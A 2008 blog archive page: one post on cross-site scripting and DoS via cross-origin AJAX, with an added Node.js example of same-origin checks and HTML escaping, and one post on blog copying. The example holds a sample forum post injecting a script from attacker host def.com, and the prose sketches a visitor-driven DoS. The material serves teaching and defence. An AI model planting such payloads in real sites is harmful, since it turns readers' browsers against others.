Month: October 2008

Cross Site Scripting (XSS) and Denial of Service (DoS) using AJAX and other Technologies

The other day I was wondering how Google Analytics works... You put a few lines of JavaScript into your page and it loads another script which sends data back to one of Google's servers. I assumed they used an AJAX XMLHttpRequest to send the stats to their server. However, an XMLHttpRequest created in JavaScript (or any script language, for that matter) can only make calls back to the server the browser loaded the page from, not the server it loaded the script from; this is the browser's same-origin policy, and "origin" here means scheme, host and port. So if, for example, a page on abc.com loads a script from def.com, that script can create an XMLHttpRequest object, but it can ONLY make calls to abc.com.

Hmmm... that's not entirely true. With IE 6.0.2900, and probably earlier versions of Firefox and other browsers, it was possible to make the XMLHttpRequest object call any server, which would be great for a Denial of Service (DoS) attack. Imagine you have a site with millions of page views a day, and you're feeling unfriendly and want to mount a DoS attack against your foe. Easy: you put some script in a frequently viewed page, and every one of your readers viewing that page unknowingly makes a call to your foe's website, stretching its ability to reply to all the requests and resulting in the DoS attack, which might even take down the server... Or, even worse, an unfriendly user of yours posts some content to a forum containing a script to perform that DoS on their own…
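As an added example that is not part of the original post (abc.com and def.com are the host names used above; flood.js and the forum markup are made up for illustration), the following Node.js script models the two points the post makes: the same-origin check a browser applies before it lets a script's XMLHttpRequest leave the page, and the HTML escaping a forum needs before it displays user-posted content, so that a post carrying a script tag is shown as text rather than executed by every reader's browser.

```javascript
// Added example, not code from the original post. Runs under Node.js; the
// global URL class does the origin parsing (default ports are dropped, so
// "http://abc.com:80" and "http://abc.com" are the same origin).

// Origin = scheme + host + port, exactly what the same-origin policy compares.
function originOf(urlString) {
  const u = new URL(urlString);
  return `${u.protocol}//${u.host}`;
}

function sameOrigin(pageUrl, requestUrl) {
  return originOf(pageUrl) === originOf(requestUrl);
}

// Models a browser deciding whether script running in the page at pageUrl may
// send an XMLHttpRequest to targetUrl. With enforceSameOrigin=false it behaves
// like the old browsers the post mentions, which let the request go anywhere.
function xhrAllowed(pageUrl, targetUrl, enforceSameOrigin = true) {
  if (!enforceSameOrigin) return true;
  return sameOrigin(pageUrl, targetUrl);
}

// How many requests reach the victim if `readers` people view the page.
// Under the same-origin policy a cross-origin XHR never leaves the browser,
// so the attacker's page contributes nothing to the flood.
function requestsReachingTarget(pageUrl, targetUrl, readers, enforceSameOrigin = true) {
  return xhrAllowed(pageUrl, targetUrl, enforceSameOrigin) ? readers : 0;
}

// Forum side: escape the HTML-significant characters before inserting user
// content into a page, so "<script>" is displayed literally, not executed.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: the post body goes straight into the page (stored XSS).
function renderPostUnsafe(body) {
  return `<div class="post">${body}</div>`;
}

// Hardened rendering: the same body, escaped.
function renderPostSafe(body) {
  return `<div class="post">${escapeHtml(body)}</div>`;
}

// Constructed sample: a forum post that tries to make every reader's browser
// load a script from def.com (the attacker's server) that would then hammer
// the victim. The file name flood.js is invented for this example.
const POISONED_POST = '<script src="http://def.com/flood.js"></script>';

// Stand-alone demonstration.
if (typeof require !== "undefined" && require.main === module) {
  console.log("abc.com -> abc.com allowed:", xhrAllowed("http://abc.com/page.html", "http://abc.com/stats"));
  console.log("abc.com -> def.com allowed:", xhrAllowed("http://abc.com/page.html", "http://def.com/stats"));
  console.log("requests reaching def.com (modern):", requestsReachingTarget("http://abc.com/", "http://def.com/", 1000000));
  console.log("requests reaching def.com (legacy):", requestsReachingTarget("http://abc.com/", "http://def.com/", 1000000, false));
  console.log("unsafe:", renderPostUnsafe(POISONED_POST));
  console.log("safe:  ", renderPostSafe(POISONED_POST));
}
```

Two things to take from it. The origin check is only a defence for the victim while browsers actually enforce it, which is why the legacy behaviour the post describes matters; and the forum's own escaping is what stops a user from turning other readers' browsers into a flood, whatever browser those readers run.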


Blog Piracy…

The internet never ceases to amaze me... For it appears someone at ease with a Cyrillic language is copying my blog word for word: http://rational_software_architect.softblog.biz/category/work/page/2/ I guess I shall take it as a compliment. I also guess they are just an RSS subscriber and their blog gets updated automatically, so perhaps all of my future postings will have copyright notices in them :-( So, this posting is Copyright 2008, Ant Kutschera!

UPDATE: Excellent - I see the site has been taken down! I wonder if it's because of the email I sent to their provider, or because they just got bored? Probably the latter :-( If you notice that the site is ever up again, please post a comment below to inform me. Thanks!
